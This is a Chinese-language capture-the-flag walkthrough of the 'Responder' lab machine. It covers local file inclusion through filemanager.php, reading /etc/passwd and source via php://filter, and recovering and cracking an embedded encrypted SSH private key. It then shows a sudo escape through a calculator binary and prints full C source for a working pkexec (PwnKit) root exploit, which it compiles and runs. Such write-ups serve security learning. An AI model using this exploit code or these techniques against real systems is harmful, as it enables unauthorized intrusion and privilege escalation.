# 靶场搭建
下载:Responder
Nat,IP: 192.168.1.170
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp filtered ssh | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-title: Site doesn't have a title (text/html). | |
|_http-server-header: Apache/2.4.38 (Debian) |
目录收集和参数 FUZZ 得到结果:192.168.1.170/filemanager.php?random=/etc/passwd
┌──(root㉿kali)-[~] | |
└─# curl -s 192.168.1.170/filemanager.php?random=/etc/passwd | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin | |
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin | |
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin | |
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin | |
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin | |
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin | |
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin | |
elliot:x:1001:1001::/home/elliot:/bin/bash | |
rohit:x:1002:1002::/home/rohit:/bin/bash |
读取 filemanager.php 的时候报了 500
加过滤器
┌──(root㉿kali)-[~] | |
└─# curl -s "http://192.168.1.170/filemanager.php?random=php://filter/convert.base64-encode/resource=/var/www/html/filemanager.php" | base64 -d | |
<?php | |
$filename = $_GET['random']; | |
include($filename); | |
header('Location:/'); | |
/* | |
-----BEGIN RSA PRIVATE KEY----- | |
Proc-Type: 4,ENCRYPTED | |
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4 | |
XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG | |
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7 | |
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t | |
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII | |
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy | |
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4 | |
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU | |
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt | |
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh | |
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3 | |
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4 | |
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf | |
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs | |
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/ | |
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE | |
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y | |
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U | |
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN | |
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F | |
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La | |
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX | |
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw | |
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb | |
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ | |
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw== | |
-----END RSA PRIVATE KEY----- | |
*/ | |
?> |
拿到私钥,连一下。ipv4 连不上,得用 ipv6
┌──(root㉿kali)-[~] | |
└─# ssh2john id_rsa > id_rsa.hash | |
┌──(root㉿kali)-[~] | |
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes | |
Cost 2 (iteration count) is 2 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
elliott (id_rsa) | |
1g 0:00:00:00 DONE (2024-06-01 09:05) 50.00g/s 169600p/s 169600c/s 169600C/s hellboy..stargirl | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. | |
┌──(root㉿kali)-[~] | |
└─# ssh -6 -i id_rsa elliot@fe80::20c:29ff:fee4:d77e%eth0 | |
Enter passphrase for key 'id_rsa': | |
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 | |
elliot@responder:~$ id | |
uid=1001(elliot) gid=1001(elliot) grupos=1001(elliot) |
# 提权
elliot@responder:~$ sudo -l | |
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre | |
Matching Defaults entries for elliot on responder: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | |
User elliot may run the following commands on responder: | |
(rohit) NOPASSWD: /usr/bin/calc | |
elliot@responder:~$ sudo -u rohit /usr/bin/calc --help | |
# 出现了:直接!/bin/bash | |
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre | |
rohit@responder:/home/elliot$ id | |
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit) |
find / -perm -4000 -type f 2>/dev/null 发现 pkexec,查看版本发现有漏洞
生成两个文件 evil-so.c 和 exploit.c
// evil-so.c | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
void gconv() {} | |
void gconv_init() { | |
setuid(0); | |
setgid(0); | |
setgroups(0); | |
execve("/bin/sh", NULL, NULL); | |
} |
// exploit.c | |
#include <stdio.h> | |
#include <stdlib.h> | |
#define BIN "/usr/bin/pkexec" | |
#define DIR "evildir" | |
#define EVILSO "evil" | |
int main() | |
{ | |
char *envp[] = { | |
DIR, | |
"PATH=GCONV_PATH=.", | |
"SHELL=ryaagard", | |
"CHARSET=ryaagard", | |
NULL | |
}; | |
char *argv[] = { NULL }; | |
system("mkdir GCONV_PATH=."); | |
system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR); | |
system("mkdir " DIR); | |
system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules"); | |
system("cp " EVILSO ".so " DIR); | |
execve(BIN, argv, envp); | |
return 0; | |
} |
编译运行,拿到 shell
rohit@responder:~$ gcc -shared -o evil.so -fPIC evil-so.c | |
evil-so.c: In function ‘gconv_init’: | |
evil-so.c:10:5: warning: implicit declaration of function ‘setgroups’; did you mean ‘getgroups’? [-Wimplicit-function-declaration] | |
setgroups(0); | |
^~~~~~~~~ | |
getgroups | |
rohit@responder:~$ gcc exploit.c -o exploit | |
exploit.c: In function ‘main’: | |
exploit.c:25:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration] | |
execve(BIN, argv, envp); | |
^~~~~~ | |
rohit@responder:~$ ./exploit | |
# cat /root/root.txt | |
2df90c7733e54427419eee2134ebde5e |
